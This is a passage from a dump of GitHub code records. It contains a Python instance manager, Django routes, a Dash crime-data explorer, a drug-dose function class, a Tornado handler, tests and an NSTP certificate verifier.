self._internalWrapperGenerators:\n                _type = '*'\n\n            if not self.constructorExists(_description.type):\n                # No constructor for this type is present in the network\n                raise Exception('Generator \"' + _description.type +\n                                '\" is not present in the network!')\n            if _type in self._internalWrapperGenerators:\n                if self._logger:\n                    self._logger.debug('No instance with the identifier: \"' + str(_description.identifier) +\n                                       '\" found, but an internal generator is available. Using the internal one for creating the instance and requesting the \"real\" instance externally')\n\n                # Now test if there is already an instance with this name and type.\n                # If so, we check if we have the correct type etc. Additionally we\n                # try to extract its dispatcher-id and will use that as selector\n                # to allow the function to be called.\n\n                _instanceDetails = self._getInstanceInfo(\n                    _description.identifier)\n\n                usedDispatcher = None\n\n                if _instanceDetails is not None and _instanceDetails.description.type != _description.type:\n                    raise Exception(\n                        \"There exists an Instance named: '\" + str(_description.identifier) + \"' but it uses a different type. 
Requested type: '\" +\n                        _description.type + \"', given type: '\" + str(_instanceDetails.description.type) + \"'\")\n\n                elif _instanceDetails is not None:\n                    usedDispatcher = _instanceDetails.dispatcher.id\n\n                if usedDispatcher and options.assignmentValid:\n\n                    # If we have a dispatcher which has been used to create the instance,\n                    # we have to check that the selected Dispatcher matches our\n                    # criteria.\n\n                    if not await options.assignmentValid(_instanceDetails.description, _instanceDetails.dispatcher):\n                        raise Exception('Assignment is invalid.')\n\n                definedInstance = await self._rpcManager.performCall(\n                    self.getServiceName(_description.type, 'constructor'),\n                    [\n                        _description\n                    ],\n                    options\n                )\n\n                if self._logger:\n                    self._logger.debug(\n                        f'Received a description for the instance \"{definedInstance.description.identifier}\"')\n\n                # Create the Wrapper for our instance.\n                wrapper = await self._internalWrapperGenerators.get(_type)(self._core, definedInstance.description)\n                if self._logger:\n                    self._logger.debug(\n                        f'Created a Wrapper for the instance \"{definedInstance.description.identifier}\"')\n\n                originalDispose = wrapper.dispose\n\n                async def dispose():\n                    await self.deleteInstance(wrapper.identifier)\n\n                    await originalDispose()\n\n                setattr(wrapper, \"dispose\", dispose)\n\n                self._instances[_description.identifier] = ensureDottedAccess({\n                    'instance': wrapper,\n                    'usedBy': [\n                        _description.dispatcherId\n                    ]\n                }\n                )\n\n                return wrapper\n\n            raise Exception('No internal generator Available!')\n\n        except Exception as e:\n\n            if self._logger:\n                self._logger.error(\n                    'While creating an Instance, the following error occurred')\n                self._logger.error(formatException(e))\n\n            raise e\n\n    async def generateWrapper(self, description):\n        # Define the Default Description\n        # which will lead to an error.\n        description = ensureDottedAccess(description)\n\n        # Assign the provided Description\n        _description = ensureDottedAccess({\n            'dispatcherId': self._id,\n            'identifier': 'error',\n            'params': [],\n            'type': 'unknown'\n        })\n        _description.update(description)\n        _description.update({'dispatcherId': self._id})\n\n        # Check if the Description is complete\n        if _description.type == 'unknown' or _description.identifier == 'error':\n            raise Exception(\n                'Please provide at least a \"type\" and \"identifier\" in the parameters')\n\n        # Use the verified Name (removes the invalid chars.)\n        _description.identifier = varifyPath(\n            _description.identifier) if self.options.forceUsingValidVarNames else _description.identifier\n        if self._logger:\n            self._logger.debug('Requesting an Instance of type: \"' + _description.type +\n                               '\" with the identifier: \"' + str(_description.identifier) + '\"')\n\n        try:\n            _type = _description.type\n            if _type not in self._internalWrapperGenerators:\n                _type = '*'\n\n            if not self.constructorExists(_description.type):\n                # No constructor for this type is present in the network\n                raise Exception('Generator \"' + _description.type +\n                                '\" is not present in the network!')\n            if _type in self._internalWrapperGenerators:\n                if self._logger:\n                    self._logger.debug('No instance with the identifier: \"' + str(_description.identifier) +\n                                       '\" found, but an internal generator is available. Using the internal one for creating the instance and requesting the \"real\" instance externally')\n\n                # Now test if there is already an instance with this name and type.\n                # If so, we check if we have the correct type etc. 
Additionally we\n                # try to extract its dispatcher-id and will use that as selector\n                # to allow the function to be called.\n\n                _instanceDetails = self._getInstanceInfo(\n                    _description.identifier)\n\n                if _instanceDetails is not None and _instanceDetails.description.type != _description.type:\n                    raise Exception(\n                        \"There exists an Instance named: '\" + str(_description.identifier) + \"' but it uses a different type. Requested type: '\" +\n                        _description.type + \"', given type: '\" + str(_instanceDetails.description.type) + \"'\")\n\n                elif _instanceDetails is None:\n                    raise Exception(\n                        'No instance known with the identifier \"' + str(_description.identifier) + '\" !')\n\n                definedInstance = _instanceDetails.description\n\n                # Create the Wrapper for our instance.\n                wrapper = await self._internalWrapperGenerators.get(_type)(self._core, definedInstance)\n                if self._logger:\n                    self._logger.debug(\n                        f'Created a Wrapper for the instance \"{definedInstance.identifier}\"')\n\n                originalDispose = wrapper.dispose\n\n                async def dispose():\n                    await self.deleteInstance(wrapper.identifier)\n\n                    await originalDispose()\n\n                setattr(wrapper, \"dispose\", dispose)\n\n                self._instances[_description.identifier] = ensureDottedAccess({\n                    'instance': wrapper,\n                    'usedBy': [\n                        _description.dispatcherId\n                    ]\n                }\n                )\n\n                return wrapper\n\n            raise Exception('No internal generator Available!')\n\n        except Exception as e:\n\n            if self._logger:\n                self._logger.error(\n                    'While creating an Instance, the following error occurred')\n                self._logger.error(formatException(e))\n\n            raise e\n\n    async def registerInstance(self, instance):\n        \"\"\" Option to statically register an instance, without using a specific generator etc.\n            This instance is just present in the network.\n\n        Args:\n            instance (INopeInstance): The Instance to register\n\n        Returns:\n            INopeInstance: The instance.\n        \"\"\"\n        self._instances[instance.identifier] = ensureDottedAccess({\n            'instance': instance,\n            'usedBy': [],\n            'manual': True\n        }\n        )\n\n        self._internalInstances.add(instance.identifier)\n\n        await self._sendAvailableInstances()\n\n        return instance\n\n    async def deleteInstance(self, instance, preventSendingUpdate=False) -> bool:\n        \"\"\" Disposes an instance and removes it. Thereby the Instance won't be available for other\n            InstanceManagers in the system.\n\n        Args:\n            instance (any): The Instance to consider\n            preventSendingUpdate (bool, optional): If set to True the other systems won't be notified. This is for internal purpose only. 
Defaults to False.\n\n        Returns:\n            bool: The success\n        \"\"\"\n        # Block to find the instance.\n        # Based on the property (string or instance)\n        # the corresponding instance object has to be selected.\n\n        _instance = None\n        _identifier = None\n\n        if isinstance(instance, str):\n            _instance = self._instances.get(instance)\n            _identifier = instance\n        else:\n            for data in self._instances.values():\n                if instance == data.instance:\n                    _instance = data\n                    _identifier = data.instance.identifier\n                    break\n        try:\n            params = ensureDottedAccess({\n                'dispatcherId': self._id,\n                'identifier': _identifier\n            })\n\n            # Call the corresponding Dispose Function for the \"real\" instance\n            # All other elements are just accessors.\n            await self._rpcManager.performCall(\n                self.getServiceName(_identifier, \"dispose\"),\n                [\n                    params\n                ]\n            )\n        except BaseException as E:\n            # Only if it is an internal\n            # Instance, we do not want to\n            # throw that error, otherwise\n            # we want that error to be\n            # present.\n            if _instance:\n                pass\n            else:\n                raise E\n\n        # if the instance has been found => delete the instance.\n        if _instance:\n            _instance.usedBy.pop()\n            if len(_instance.usedBy) == 0:\n\n                # Delete the Identifier\n                self._instances.pop(_instance.instance.identifier)\n\n                # Check if an update should be emitted or not.\n                if not preventSendingUpdate:\n                    # Update the Instances provided by this module.\n                    await self._sendAvailableInstances()\n\n                return True\n        return False\n\n    async def getInstancesOfType(self, typeToGet: str):\n        \"\"\" Creates Wrappers for the Type of the given element.\n\n        Args:\n            typeToGet (str): Type of the instances to get the wrappers for.\n\n        Returns:\n            list: List containing all known Elements of the given type.\n        \"\"\"\n\n        identifiers = map(lambda item: item.identifier, filter(\n            lambda item: item.type == typeToGet, self.instances.data.getContent()))\n\n        promises = []\n\n        for identifier in identifiers:\n            promises.append(\n                self.createInstance(\n                    ensureDottedAccess({\n                        'identifier': identifier,\n                        'type': typeToGet,\n                        'params': []\n                    })\n                )\n            )\n\n        # Wait to generate all Instances.\n        if promises:\n            result = await asyncio.gather(*promises)\n            return result\n\n    def reset(self):\n        self._mappingOfRemoteDispatchersAndGenerators.clear()\n        self._mappingOfRemoteDispatchersAndInstances.clear()\n        self.constructors.update()\n        self.instances.update()\n        self._internalWrapperGenerators = dict()\n        self._registeredConstructors = dict()\n\n        # If Instances exist => Delete them.\n        if self._instances:\n\n            promises = []\n\n            # Dispose all Instances.\n            for name, instance in self._instances.items():\n\n                def onDone(p, name=name):\n                    if p.exception() and self._logger:\n                        self._logger.error(\n                            'Failed Removing Instance \"' + name + '\"')\n                        self._logger.error(formatException(p.exception()))\n\n                promise: asyncio.Future = self.deleteInstance(name, True)\n                promise.add_done_callback(onDone)\n\n                if self._logger:\n                    self._logger.warn('Disposing instance \"' + name + '\"')\n\n                promises.append(promise)\n\n            EXECUTOR.callParallel(asyncio.gather, *promises)\n\n        self._instances = dict()\n        self._externalInstances = dict()\n        self._internalInstances = set()\n        self._initializingInstance = dict()\n        self._externalInstancesNames = set()\n        self.internalInstances.setContent([])\n\n        if self._communicator.connected.getContent():\n            EXECUTOR.callParallel(self._sendAvailableInstances)\n\n    async def dispose(self):\n        self.reset()\n        self.instances.dispose()\n        self.__disposed = True\n\n    def __del__(self):\n        if not self.__disposed:\n            
EXECUTOR.callParallel(self.dispose)\n","repo_name":"ZeMA-gGmbH/NoPE-PY","sub_path":"nope/dispatcher/instanceManager/instanceManager.py","file_name":"instanceManager.py","file_ext":"py","file_size_in_byte":38653,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"19782104904","text":"from django.urls import path\r\nfrom .views import *\r\nfrom django.contrib.auth.views import LogoutView\r\n\r\nurlpatterns = [\r\n    path('login/', CustomLoginView.as_view(), name='login'),\r\n    path('logout/', LogoutView.as_view(next_page='login'), name='logout'),\r\n    path('register/', RegisterView.as_view(), name='register'),\r\n    path('', TaskList.as_view(), name='tasks'),\r\n\r\n    path('task/<int:pk>/', TaskDetail.as_view(), name='task'),\r\n    path('task-create/', TaskCreate.as_view(), name='task-create'),\r\n    path('habit-create/', HabitCreate.as_view(), name='habit-create'),\r\n    path('event-create/', EventCreate.as_view(), name='event-create'),\r\n\r\n    path('task-edit/<int:pk>/', TaskUpdate.as_view(), name='task-update'),\r\n    path('habit-edit/<int:pk>/', HabitUpdate.as_view(), name='habit-update'),\r\n    path('event-edit/<int:pk>/', EventUpdate.as_view(), name='event-update'),\r\n\r\n    path('task-delete/<int:pk>/', DeleteTask.as_view(), name='task-delete'),\r\n    path('habit-delete/<int:pk>/', DeleteHabit.as_view(), name='habit-delete'),\r\n    path('event-delete/<int:pk>/', DeleteEvent.as_view(), name='event-delete'),\r\n\r\n    path('calendar/<int:year>/<int:month>/', calendar_view, name='calendar'),\r\n]","repo_name":"Bartkosa/online-pinboard","sub_path":"todo_list/base/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"34856023021","text":"# load library\nimport dash\nfrom dash import dcc\nfrom dash import html\nimport pandas as pd\nimport plotly.graph_objs as go\nimport plotly.express as px\nimport dash_bootstrap_components as dbc\n\n# Load data\ndf = pd.read_csv(\"data/processed_communities.csv\")\n\n# Select only columns with numerical values\ncolumn_list = {\"latitude\": \"Latitude\",\n               \"longitude\": \"Longitude\",\n               \"population\": \"Population\",\n               \"PopDens\": \"Population Density\",\n               \"racepctblack\": \"Black Race Percentage\",\n               \"racePctWhite\": \"White Race Percentage\",\n               \"racePctAsian\": \"Asian Race Percentage\",\n               \"agePct12t29\": \"Age Percentage (12-29)\",\n               \"agePct65up\": \"Age Percentage (65+)\",\n               \"medIncome\": \"Median Income\",\n               \"violent_crime_rate\": \"Violent Crime Rate\",\n               \"NumStreet\": \"Number of Streets\",\n               \"PctUnemployed\": \"Unemployed Percentage\"\n               }\ndf = df[column_list]\n\n# rename columns\ndf = df.rename(columns = column_list)\n\n# Define app and layout\napp = dash.Dash(__name__, external_stylesheets = [dbc.themes.SOLAR])\n\napp.layout = dbc.Container(\n    [\n        dbc.Row(\n            [\n                dbc.Col(\n                    [\n                        html.H1(\"Explore Crime Rate With Different Factors\"),\n                        dcc.Dropdown(\n                            id = \"scatter-x\",\n                            options = [{\"label\": colname, \"value\": colname} for colname in df.columns],\n                            value = \"Population\"\n                        ),\n                        dcc.Dropdown(\n                            id = \"scatter-y\",\n                            options = [{\"label\": colname, \"value\": colname} for colname in df.columns],\n                            value = \"Violent Crime Rate\"\n                        ),\n                        dcc.Graph(id = \"scatter-plot\")\n                    ],\n                    md = 6,\n                ),\n                dbc.Col(\n                    [\n                        dcc.Dropdown(\n                            id = \"correlation-column\",\n                            options = [{\"label\": colname, \"value\": colname} for colname in df.columns],\n                            value = \"Population\"\n                        ),\n                        html.Table(id = \"correlation-table\")\n                    ],\n                    md = 6,\n                ),\n            ]\n        )\n    ],\n    fluid = True,\n)\n\n# 
Define callbacks\n@app.callback(\n    dash.dependencies.Output(\"scatter-plot\", \"figure\"),\n    [dash.dependencies.Input(\"scatter-x\", \"value\"),\n    dash.dependencies.Input(\"scatter-y\", \"value\")]\n)\n\n# Scatter plot\ndef update_scatter_plot(xcol, ycol):\n    fig = px.scatter(df, x = xcol, y = ycol)\n    return fig\n\n@app.callback(\n    dash.dependencies.Output(\"correlation-table\", \"children\"),\n    [dash.dependencies.Input(\"correlation-column\", \"value\")]\n)\n\n# Correlation table\ndef update_correlation_table(col):\n    corr_df = df.corr()[col].reset_index()\n    corr_df.columns = [\"Column\", \"Correlation\"]\n    corr_df = corr_df.round(3)\n    corr_table = [html.Tr([html.Th(\"Column\"), html.Th(\"Correlation\")])]\n    for i in range(len(corr_df)):\n        corr_table.append(html.Tr([\n            html.Td(corr_df.iloc[i][\"Column\"]),\n            html.Td(corr_df.iloc[i][\"Correlation\"])\n        ]))\n    return corr_table\n\n# Run app\nif __name__ == '__main__':\n    app.run_server(debug=True)","repo_name":"wakesyracuse7/Communites_and_Crime_dash","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4368380695","text":"import numpy as np\n\n\nclass GaussConvFn():\n    \"\"\"\n    This class represents the convolution of a delta function with a Gaussian function.\n    By Gaussian function we mean the pdf of a Gaussian distribution.\n    The purpose of this function is to build up a smooth function which is close to a delta function,\n    and enable the numerical solution of the ODE using the Runge-Kutta method.\n    Formally, let us denote \\\\rho(t)=A * \\\\delta(t-t_center), where A is the magnitude, and\n    \\\\omega(t) = \\\\int \\\\frac{1}{\\\\sqrt{2\\\\pi}\\\\sigma}e^{-\\\\frac{t^2}{2\\\\sigma^2}},\n    then this class just represents \\\\rho * \\\\omega (t), where * is the convolution.\n    See the definition in https://en.wikipedia.org/wiki/Convolution for more information.\n    \"\"\" \n    def __init__(self, center: float, magnitude: float, sigma=0.02):\n        \"\"\"\n        params:\n            center: t_center\n            magnitude: magnitude in the delta function\n            sigma: sigma in the pdf of the Gaussian distribution.\n\n        Note that sigma must not be too small, otherwise ODE solving might fail using the Runge-Kutta method.\n        \"\"\"\n        self.center = center\n        self.magnitude = magnitude\n        self.sigma = sigma\n\n    def eval_at(self, x: float) -> float:\n        '''\n        Return the value of this function at x.\n        '''\n        return self.magnitude / (2 * np.pi) ** 0.5 / self.sigma * np.exp(-(x - self.center)**2 / (2 * self.sigma ** 2))\n\n\nclass DoseFn():\n\n    \"\"\"\n    This class represents the dose function in the ODE.\n    The dose function DOSE(t) should be a linear combination of several pseudo delta functions (see GaussConvFn),\n    plus a constant value.\n    It can consist of instantaneous doses of X ng of the drug at one or more time points,\n    or a steady application of X ng per hour over a given time period, or some combination.\n\n    Building up an object needs to specify:\n        the steady application dose (constinput)\n        A list of instantaneous dosing times and quantities (centerpoints & magnitudes)\n    \"\"\"\n    \n    def __init__(self, constinput=0, centerpoints=None, magnitudes=None):\n        '''\n        params:\n            constinput: the steady dose, by default set to 0\n            centerpoints: time points of instantaneous doses, should be a list\n            magnitudes: amounts of instantaneous doses, should be a list (length equal to centerpoints)\n        '''\n\n        self.constinput = constinput\n        self.deltainput = []\n        if centerpoints is not None:\n            if len(centerpoints) == 
len(magnitudes):\n for i in range(len(centerpoints)):\n self.deltainput.append(GaussConvFn(centerpoints[i], magnitudes[i]))\n else:\n raise ValueError('The length of centerpoints and magnitudes list should be the same!')\n\n def eval_at(self, x):\n '''\n Return the dose function value at x\n '''\n \n result = self.constinput\n for i in range(len(self.deltainput)):\n result += self.deltainput[i].eval_at(x)\n\n return result\n","repo_name":"laraherriott/PK-project","sub_path":"pkmodel/dose.py","file_name":"dose.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"32191303639","text":"# -*- coding: iso-8859-15 -*-\n\nimport tornado.web\nimport tornado.escape\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass UsersHandler(tornado.web.RequestHandler):\n def initialize(self, db=None):\n self.db = db\n\n # @tornado.gen.coroutine\n async def get(self, _slash, email):\n mongo = self.application.mongo\n db = mongo.prueba\n\n query = {}\n if email is not None:\n query = {\n 'email': email\n }\n\n responses = []\n async for user in db.users.find(query):\n user['_id'] = str(user['_id'])\n responses.append(user)\n\n self.set_header('Content-Type', 'text/javascript')\n self.write(tornado.escape.json_encode(responses))\n # self.render('../static/index.html')\n\n # @tornado.gen.coroutine\n async def post(self, _slash, _email):\n if _email is not None:\n self.set_status(403)\n else:\n data = tornado.escape.json_decode(self.request.body)\n db = self.application.mongo.prueba\n\n logger.info(f'Body keys: {list(data.keys())}')\n logger.info(f\"data[key2] = {data['key2']}\")\n\n insert_id = await db.users.insert_one(data)\n self.set_header('Content-Type', 'text/javascript')\n self.write(tornado.escape.json_encode(\n {\"_id\": str(insert_id.inserted_id)}))\n\n async def put(self):\n self.set_status(403)\n","repo_name":"andfoy/tornado-skeleton","sub_path":"server/web/users_handler.py","file_name":"users_handler.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27108895651","text":"from bs4 import BeautifulSoup as BS\nimport re\ndef clean_story(file_name):\n\n\tprint('Processing story ' + file_name)\n\t# extract the basic data out of html flags\n\twith open(file_name) as f:\n\t\tsoup = BS(''.join(f.readlines()), 'html.parser')\n\n\ttitle = soup.title.text\n\tstory = ''\n\n\tnumber_of_skips = 1\n\n\n\tfor par in soup.find_all('p'):\n\t\tif number_of_skips > 0:\n\t\t\tnumber_of_skips -= 1\n\t\telif not len(par.attrs) and not len(par.contents[0].attrs):\n\t\t\tstory += par.text\n\n\n\t# remove [1] etc for references\n\tstory = re.sub('\\[\\w+]', '', story)\n\n\treturn title, story\n","repo_name":"daphnei/nn_chatbot","sub_path":"rejected/gft/clean_story.py","file_name":"clean_story.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"4899696047","text":"import time\nfrom unittest.mock import Mock, patch\n\nfrom murakami.exporters.http import HTTPExporter\n\nRESPONSE_SUCCESS_JSON = {\n 'status': 'success'\n}\n\nRESPONSE_FAILURE_JSON = {\n 'error': '',\n 'message': ''\n}\n\n@patch('requests.post')\ndef test_push_response_ok(mock_post):\n mock_post.return_value = Mock(ok=True)\n mock_post.return_value.json.return_value = RESPONSE_SUCCESS_JSON\n\n exporter = HTTPExporter(\"test\", config={'url': 
'http://testurl'})\n assert exporter.push(\"ndt5\", '{\"TestName\": \"ndt5\"}', time.time()) is True\n\n@patch('requests.post')\ndef test_push_response_error(mock_post):\n mock_post.return_value = Mock(ok=False)\n mock_post.return_value.json.return_value = RESPONSE_FAILURE_JSON\n\n exporter = HTTPExporter(\"test\", config={'url': 'http://testurl'})\n assert exporter.push(\"ndt5\", '{\"TestName\": \"ndt5\"}', time.time()) is False\n","repo_name":"m-lab/murakami","sub_path":"tests/test_http.py","file_name":"test_http.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"40"} +{"seq_id":"70151965880","text":"from datetime import timedelta\nimport logging\nfrom django.test import TestCase\nfrom django.utils import timezone\nfrom apps.dashboard.models.goal import Goal\nfrom apps.dashboard.models.maturity_model import EvaluationType, MaturityModelItem\nfrom apps.dashboard.models.project_maturity_state import ProjectMaturityItemState, ProjectMaturityLevelState\nfrom apps.dashboard.tests.utils import setup_basic_environment\nfrom apps.dashboard.serializers import ProjectMaturityStateSerializer\nfrom apps.dashboard.models import ProjectMaturityState\n\n\nclass ProjectMaturityStateSerializerTest(TestCase):\n def setUp(self) -> None:\n self.env = setup_basic_environment()\n\n def test_project_maturity_state_fields_should_be_present(self):\n project_maturity_state = ProjectMaturityState(self.env.project, [])\n serialized_maturity_state = ProjectMaturityStateSerializer(instance=project_maturity_state).data\n self.assertEqual(serialized_maturity_state[\"name\"],\n self.env.maturity_model.name)\n self.assertEqual(serialized_maturity_state[\"maturity_level_states\"], [])\n self.assertIsNotNone(serialized_maturity_state[\"achieved_level\"])\n self.assertEqual(serialized_maturity_state[\"passed_enabled_items_count\"], 0)\n\n def test_maturity_level_state_fields_should_be_present(self):\n project_maturity_state = ProjectMaturityState(self.env.project,\n [\n ProjectMaturityLevelState(\n self.env.maturity_model_level,\n []\n )\n ])\n serialized_maturity_state = ProjectMaturityStateSerializer(instance=project_maturity_state).data\n maturity_level_states = serialized_maturity_state[\"maturity_level_states\"]\n self.assertEqual(len(maturity_level_states), 1)\n maturity_level_state = maturity_level_states[0]\n self.assertEqual(maturity_level_state[\"id\"], self.env.maturity_model_level.pk)\n self.assertEqual(maturity_level_state[\"name\"], self.env.maturity_model_level.name)\n self.assertEqual(maturity_level_state[\"description\"], self.env.maturity_model_level.description)\n\n def test_maturity_item_state_light_fields_should_be_present(self):\n evaluation_type = EvaluationType.objects.create(kind=EvaluationType.KIND_MANUAL)\n mm_items = [\n MaturityModelItem.objects.create(\n maturity_model_level=self.env.maturity_model_level,\n name=\"1\",\n code=\"T001\",\n evaluation_type=evaluation_type\n ),\n MaturityModelItem.objects.create(\n maturity_model_level=self.env.maturity_model_level,\n name=\"2\",\n code=\"T002\",\n evaluation_type=evaluation_type\n ),\n ]\n goal = Goal.objects.create(\n project=self.env.project,\n due_date=(timezone.now() + timedelta(days=10)).date()\n )\n goal.maturity_model_items.set(mm_items[:1])\n maturity_item_states = [\n ProjectMaturityItemState(\n mm_items[0],\n is_disabled=False,\n is_passed=True,\n closest_goal=goal,\n latest_pending_evaluation_request_id=None,\n latest_pending_toggle_request_id=None\n 
),\n ProjectMaturityItemState(\n mm_items[1],\n is_disabled=True,\n is_passed=False,\n closest_goal=None,\n latest_pending_evaluation_request_id=None,\n latest_pending_toggle_request_id=None\n ),\n ]\n project_maturity_state = ProjectMaturityState(self.env.project,\n [\n ProjectMaturityLevelState(\n self.env.maturity_model_level,\n maturity_item_states\n )\n ])\n serialized_maturity_state = ProjectMaturityStateSerializer(instance=project_maturity_state).data\n items = serialized_maturity_state[\"maturity_level_states\"][0][\"maturity_item_states\"]\n self.assertEqual(len(items), 2)\n for i, item_data in enumerate(items):\n logging.debug(f\"Asserting fields of item_data {i}\")\n self.assertEqual(item_data[\"maturity_item\"][\"id\"], maturity_item_states[i].maturity_item.pk)\n self.assertEqual(item_data[\"maturity_item\"][\"code\"], maturity_item_states[i].maturity_item.code)\n self.assertEqual(item_data[\"maturity_item\"][\"name\"], maturity_item_states[i].maturity_item.name)\n self.assertEqual(item_data[\"maturity_item\"][\"evaluation_type\"][\"kind\"], maturity_item_states[i].maturity_item.evaluation_type.kind)\n self.assertEqual(item_data[\"disabled\"], maturity_item_states[i].is_disabled)\n self.assertEqual(item_data[\"latest_pending_evaluation_request_id\"], maturity_item_states[i].latest_pending_evaluation_request_id)\n self.assertEqual(item_data[\"is_passed\"], maturity_item_states[i].is_passed)\n if maturity_item_states[i].closest_goal is None:\n self.assertIsNone(item_data[\"closest_goal\"])\n else:\n self.assertIsNotNone(item_data[\"closest_goal\"])\n","repo_name":"sahabpardaz/nemo","sub_path":"backend/apps/dashboard/tests/test_project_maturity_state_serializer.py","file_name":"test_project_maturity_state_serializer.py","file_ext":"py","file_size_in_byte":5630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"32821029951","text":"\"\"\"PKI interface.\"\"\"\n\nimport datetime\nimport hashlib\nimport logging\nimport struct\nfrom pathlib import Path\n\nfrom nacl.bindings import \\\n crypto_sign_ed25519ph_state, \\\n crypto_sign_ed25519ph_update, \\\n crypto_sign_ed25519ph_final_verify\n\nfrom nstp_v4_pb2 import *\n\n\ndef load_trust_store(path: Path) -> CertificateStore:\n \"\"\"Deserialize a trust store.\"\"\"\n\n store = CertificateStore()\n with path.open(\"rb\") as fd:\n data = fd.read()\n store.ParseFromString(data)\n return store\n\n\ndef load_certificate(path: Path) -> Certificate:\n \"\"\"Deserialize a certificate.\"\"\"\n\n cert = Certificate()\n with path.open(\"rb\") as fd:\n data = fd.read()\n cert.ParseFromString(data)\n return cert\n\n\ndef load_private_key(path: Path) -> PrivateKey:\n \"\"\"Deserialize a private key.\"\"\"\n\n key = PrivateKey()\n with path.open(\"rb\") as fd:\n data = fd.read()\n key.ParseFromString(data)\n return key\n\n\ndef load_certificate_status(path: Path) -> CertificateStatusResponse:\n \"\"\"Deserialize a certificate status response.\"\"\"\n\n status = CertificateStatusResponse()\n with path.open(\"rb\") as fd:\n data = fd.read()\n status.ParseFromString(data)\n return status\n\n\ndef hash_certificate_sha256(cert: Certificate) -> CertificateHash:\n h = hashlib.sha256()\n return hash_certificate(cert, h, HashAlgorithm.SHA256)\n\n\ndef hash_certificate_sha512(cert: Certificate) -> CertificateHash:\n h = hashlib.sha512()\n return hash_certificate(cert, h, HashAlgorithm.SHA512)\n\n\nclass CertificateVerifier(object):\n \"\"\"Certificate verifier.\"\"\"\n\n # TODO: Add pinned certs\n def 
__init__(self, trust_store: CertificateStore) -> None:\n \"\"\"Initializer.\"\"\"\n\n # Hash all trusted certs\n self.trusted_certs = {}\n for c in trust_store.certificates:\n self.trusted_certs[hash_certificate_sha256(c).value] = c\n self.trusted_certs[hash_certificate_sha512(c).value] = c\n\n def verify_certificate(self, cert: Certificate, usage: CertificateUsage) -> None:\n \"\"\"Verify a certificate against a trust store.\"\"\"\n\n # Check the validity window and usage\n now = datetime.datetime.now().timestamp()\n if now < cert.valid_from or now >= cert.valid_from + cert.valid_length:\n raise Exception(\"current timestamp is outside certificate validity window\")\n if usage not in cert.usages:\n raise Exception(\"not a server certificate\")\n\n # Find the issuer cert\n if not cert.HasField(\"issuer\"):\n raise Exception(\"no issuer\")\n ca_cert = self.trusted_certs.get(cert.issuer.value)\n if ca_cert is None:\n raise Exception(\"unknown issuer\")\n\n # Check the issuer's validity window and usage\n if now < ca_cert.valid_from or now >= ca_cert.valid_from + ca_cert.valid_length:\n raise Exception(\"current timestamp is outside CA certificate validity window\")\n if CertificateUsage.CERTIFICATE_SIGNING not in ca_cert.usages:\n raise Exception(\"not a CA certificate\")\n\n # Verify the issuer signature\n state = crypto_sign_ed25519ph_state()\n self._certificate_signature_state(state, cert, False)\n crypto_sign_ed25519ph_final_verify(state, cert.issuer_signature, ca_cert.signing_public_key)\n\n def verify_server_certificate(self, cert: Certificate, subject: str) -> None:\n \"\"\"Verify a server certificate.\"\"\"\n\n logging.debug(\"verifying server certificate\")\n self.verify_certificate(cert, CertificateUsage.SERVER_AUTHENTICATION)\n if all([x != subject for x in cert.subjects]):\n raise Exception(\"subject mismatch\")\n\n def verify_status_certificate(self, status_cert: Certificate, subject: str) -> None:\n \"\"\"Verify a status certificate.\"\"\"\n\n logging.debug(\"verifying status certificate\")\n self.verify_certificate(status_cert, CertificateUsage.STATUS_SIGNING)\n if all([x != subject for x in status_cert.subjects]):\n raise Exception(\"subject mismatch\")\n\n def verify_server_certificate_status(self,\n cert: Certificate,\n status: CertificateStatusResponse,\n status_subject: str) -> None:\n \"\"\"Verify a server certificate status against a trust store.\"\"\"\n\n logging.debug(\"verifying server certificate status\")\n\n # Check that the status hash matches\n if status.certificate.algorithm == HashAlgorithm.SHA256:\n cert_hash = hash_certificate_sha256(cert)\n elif status.certificate.algorithm == HashAlgorithm.SHA512:\n cert_hash = hash_certificate_sha512(cert)\n else:\n raise Exception(f\"unsupported hash algorithm {status.certificate.algorithm}\")\n\n if cert_hash.value != status.certificate.value:\n raise Exception(\"certificate and status response mismatch\")\n\n # Check the validity window\n now = datetime.datetime.now().timestamp()\n if now < status.valid_from or now >= status.valid_from + status.valid_length:\n raise Exception(\"current timestamp is outside status validity window\")\n\n # Check the status certificate\n self.verify_status_certificate(status.status_certificate, status_subject)\n\n # Verify the status signature\n state = crypto_sign_ed25519ph_state()\n self._status_signature_state(state, status)\n crypto_sign_ed25519ph_final_verify(state, status.status_signature, status.status_certificate.signing_public_key)\n\n # Finally, check the actual status\n if 
